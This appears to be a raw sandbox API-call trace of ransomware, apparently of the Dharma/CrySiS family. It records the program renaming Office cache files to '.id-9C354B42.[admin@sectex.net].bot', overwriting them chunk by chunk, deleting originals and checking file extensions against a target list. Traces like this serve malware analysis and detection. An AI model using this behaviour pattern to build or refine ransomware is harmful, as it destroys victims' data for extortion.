	[0044.647] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0044.647] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0044.647] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0x0) returned 1
	[0044.647] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.648] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xac70058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.652] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xcc155, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.652] ReadFile (in: hFile=0x1d0, lpBuffer=0xacb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacb0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.662] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0044.662] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x224400, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.662] ReadFile (in: hFile=0x1d0, lpBuffer=0xacf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacf0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.718] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.718] WriteFile (in: hFile=0x1d0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0xa05fcb0, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fcb0*=0xc0106, lpOverlapped=0x0) returned 1
	[0044.768] SetEndOfFile (hFile=0x1d0) returned 1
	[0044.769] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb462760
	[0044.772] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.773] WriteFile (in: hFile=0x1d0, lpBuffer=0xb462760*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb462760*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.774] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xcc155, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.774] WriteFile (in: hFile=0x1d0, lpBuffer=0xb462760*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb462760*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0045.056] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x224400, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0045.057] WriteFile (in: hFile=0x1d0, lpBuffer=0xb462760*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb462760*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0045.062] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb462760 | out: hHeap=0x7d60000) returned 1
	[0045.065] CloseHandle (hObject=0x1d0) returned 1
	[0045.065] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0045.065] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76
	[0045.065] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76
	[0045.065] lstrlenW (lpString=".doc") returned 4
	[0045.065] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0045.065] lstrlenW (lpString=".docx") returned 5
	[0045.065] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0045.065] lstrlenW (lpString=".pdf") returned 4
	[0045.065] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0045.065] lstrlenW (lpString=".xls") returned 4
	[0045.065] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0045.065] lstrlenW (lpString=".xlsx") returned 5
	[0045.065] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0045.065] lstrlenW (lpString=".ppt") returned 4
	[0045.066] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0045.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76
	[0045.066] lstrlenW (lpString=".zip") returned 4
	[0045.066] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0045.066] lstrlenW (lpString=".rar") returned 4
	[0045.066] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0045.066] lstrlenW (lpString=".bz2") returned 4
	[0045.066] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0045.066] lstrlenW (lpString=".7z") returned 3
	[0045.066] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0045.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76
	[0045.066] lstrlenW (lpString=".dbf") returned 4
	[0045.066] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0045.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76
	[0045.066] lstrlenW (lpString=".1cd") returned 4
	[0045.066] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0045.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76
	[0045.066] lstrlenW (lpString=".jpg") returned 4
	[0045.066] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0045.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76
	[0045.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76
	[0045.066] lstrlenW (lpString=".doc") returned 4
	[0045.066] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0045.066] lstrlenW (lpString=".docx") returned 5
	[0045.066] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0045.066] lstrlenW (lpString=".pdf") returned 4
	[0045.066] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0045.066] lstrlenW (lpString=".xls") returned 4
	[0045.066] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0045.066] lstrlenW (lpString=".xlsx") returned 5
	[0045.066] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0045.066] lstrlenW (lpString=".ppt") returned 4
	[0045.066] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0045.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76
	[0045.066] lstrlenW (lpString=".zip") returned 4
	[0045.067] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0045.067] lstrlenW (lpString=".rar") returned 4
	[0045.067] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0045.067] lstrlenW (lpString=".bz2") returned 4
	[0045.067] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0045.067] lstrlenW (lpString=".7z") returned 3
	[0045.067] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0045.067] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76
	[0045.067] lstrlenW (lpString=".dbf") returned 4
	[0045.067] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0045.067] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76
	[0045.067] lstrlenW (lpString=".1cd") returned 4
	[0045.067] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0045.067] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 76
	[0045.067] lstrlenW (lpString=".jpg") returned 4
	[0045.067] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0045.067] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0045.067] lstrlenW (lpString="OfficeLR.cab") returned 12
	[0045.067] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0045.067] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=14127746) returned 1
	[0045.067] CloseHandle (hObject=0x1d0) returned 1
	[0045.068] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab")) returned 0x2020
	[0045.068] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.068] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0045.068] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0045.068] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0x0) returned 1
	[0045.068] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0045.068] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xac70058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0045.073] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x47db80, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0045.073] ReadFile (in: hFile=0x1d0, lpBuffer=0xacb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacb0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0045.076] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0045.076] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xd39282, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0045.076] ReadFile (in: hFile=0x1d0, lpBuffer=0xacf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacf0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0045.090] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.221] WriteFile (in: hFile=0x1d0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0xa05fcb0, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fcb0*=0xc0104, lpOverlapped=0x0) returned 1
	[0045.555] SetEndOfFile (hFile=0x1d0) returned 1
	[0045.555] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb472768
	[0045.558] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0045.558] WriteFile (in: hFile=0x1d0, lpBuffer=0xb472768*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb472768*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0045.559] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x47db80, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0045.559] WriteFile (in: hFile=0x1d0, lpBuffer=0xb472768*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb472768*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0045.560] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xd39282, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0045.560] WriteFile (in: hFile=0x1d0, lpBuffer=0xb472768*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb472768*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0045.562] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb472768 | out: hHeap=0x7d60000) returned 1
	[0045.562] CloseHandle (hObject=0x1d0) returned 1
	[0045.563] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0045.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75
	[0045.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75
	[0045.563] lstrlenW (lpString=".doc") returned 4
	[0045.563] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0045.563] lstrlenW (lpString=".docx") returned 5
	[0045.563] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0045.563] lstrlenW (lpString=".pdf") returned 4
	[0045.563] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0045.563] lstrlenW (lpString=".xls") returned 4
	[0045.563] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0045.563] lstrlenW (lpString=".xlsx") returned 5
	[0045.563] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0045.563] lstrlenW (lpString=".ppt") returned 4
	[0045.563] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0045.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75
	[0045.563] lstrlenW (lpString=".zip") returned 4
	[0045.563] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0045.563] lstrlenW (lpString=".rar") returned 4
	[0045.563] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0045.563] lstrlenW (lpString=".bz2") returned 4
	[0045.563] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0045.563] lstrlenW (lpString=".7z") returned 3
	[0045.563] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0045.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75
	[0045.563] lstrlenW (lpString=".dbf") returned 4
	[0045.563] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0045.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75
	[0045.564] lstrlenW (lpString=".1cd") returned 4
	[0045.564] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0045.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75
	[0045.564] lstrlenW (lpString=".jpg") returned 4
	[0045.564] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0045.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75
	[0045.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75
	[0045.564] lstrlenW (lpString=".doc") returned 4
	[0045.564] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0045.564] lstrlenW (lpString=".docx") returned 5
	[0045.564] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0045.564] lstrlenW (lpString=".pdf") returned 4
	[0045.564] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0045.564] lstrlenW (lpString=".xls") returned 4
	[0045.564] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0045.564] lstrlenW (lpString=".xlsx") returned 5
	[0045.564] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0045.564] lstrlenW (lpString=".ppt") returned 4
	[0045.564] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0045.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75
	[0045.564] lstrlenW (lpString=".zip") returned 4
	[0045.564] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0045.564] lstrlenW (lpString=".rar") returned 4
	[0045.564] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0045.564] lstrlenW (lpString=".bz2") returned 4
	[0045.564] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0045.564] lstrlenW (lpString=".7z") returned 3
	[0045.564] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0045.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75
	[0045.564] lstrlenW (lpString=".dbf") returned 4
	[0045.564] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0045.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75
	[0045.564] lstrlenW (lpString=".1cd") returned 4
	[0045.564] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0045.565] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75
	[0045.565] lstrlenW (lpString=".jpg") returned 4
	[0045.565] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0045.565] lstrcmpiW (lpString1=".MST", lpString2=".bot") returned 1
	[0045.565] lstrlenW (lpString="ShellUI.MST") returned 11
	[0045.565] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0045.565] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=3584) returned 1
	[0045.565] CloseHandle (hObject=0x1d0) returned 1
	[0045.565] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst")) returned 0x2020
	[0045.565] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.565] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0045.565] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.566] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.566] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0045.566] GetLastError () returned 0x0
	[0045.566] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0xe00, lpOverlapped=0x0) returned 1
	[0045.619] WriteFile (in: hFile=0x1a8, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xe10, lpOverlapped=0x0) returned 1
	[0045.621] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.621] WriteFile (in: hFile=0x1a8, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0045.621] SetEndOfFile (hFile=0x1a8) returned 1
	[0045.621] CloseHandle (hObject=0x1a8) returned 1
	[0045.621] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.621] SetEndOfFile (hFile=0x1d0) returned 1
	[0045.622] CloseHandle (hObject=0x1d0) returned 1
	[0045.622] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0045.623] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst")) returned 1
	[0045.623] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74
	[0045.623] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74
	[0045.623] lstrlenW (lpString=".doc") returned 4
	[0045.623] lstrcmpiW (lpString1=".doc", lpString2=".MST") returned -1
	[0045.623] lstrlenW (lpString=".docx") returned 5
	[0045.623] lstrcmpiW (lpString1=".docx", lpString2="I.MST") returned -1
	[0045.623] lstrlenW (lpString=".pdf") returned 4
	[0045.623] lstrcmpiW (lpString1=".pdf", lpString2=".MST") returned 1
	[0045.623] lstrlenW (lpString=".xls") returned 4
	[0045.623] lstrcmpiW (lpString1=".xls", lpString2=".MST") returned 1
	[0045.623] lstrlenW (lpString=".xlsx") returned 5
	[0045.623] lstrcmpiW (lpString1=".xlsx", lpString2="I.MST") returned -1
	[0045.623] lstrlenW (lpString=".ppt") returned 4
	[0045.623] lstrcmpiW (lpString1=".ppt", lpString2=".MST") returned 1
	[0045.623] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74
	[0045.623] lstrlenW (lpString=".zip") returned 4
	[0045.623] lstrcmpiW (lpString1=".zip", lpString2=".MST") returned 1
	[0045.623] lstrlenW (lpString=".rar") returned 4
	[0045.623] lstrcmpiW (lpString1=".rar", lpString2=".MST") returned 1
	[0045.623] lstrlenW (lpString=".bz2") returned 4
	[0045.623] lstrcmpiW (lpString1=".bz2", lpString2=".MST") returned -1
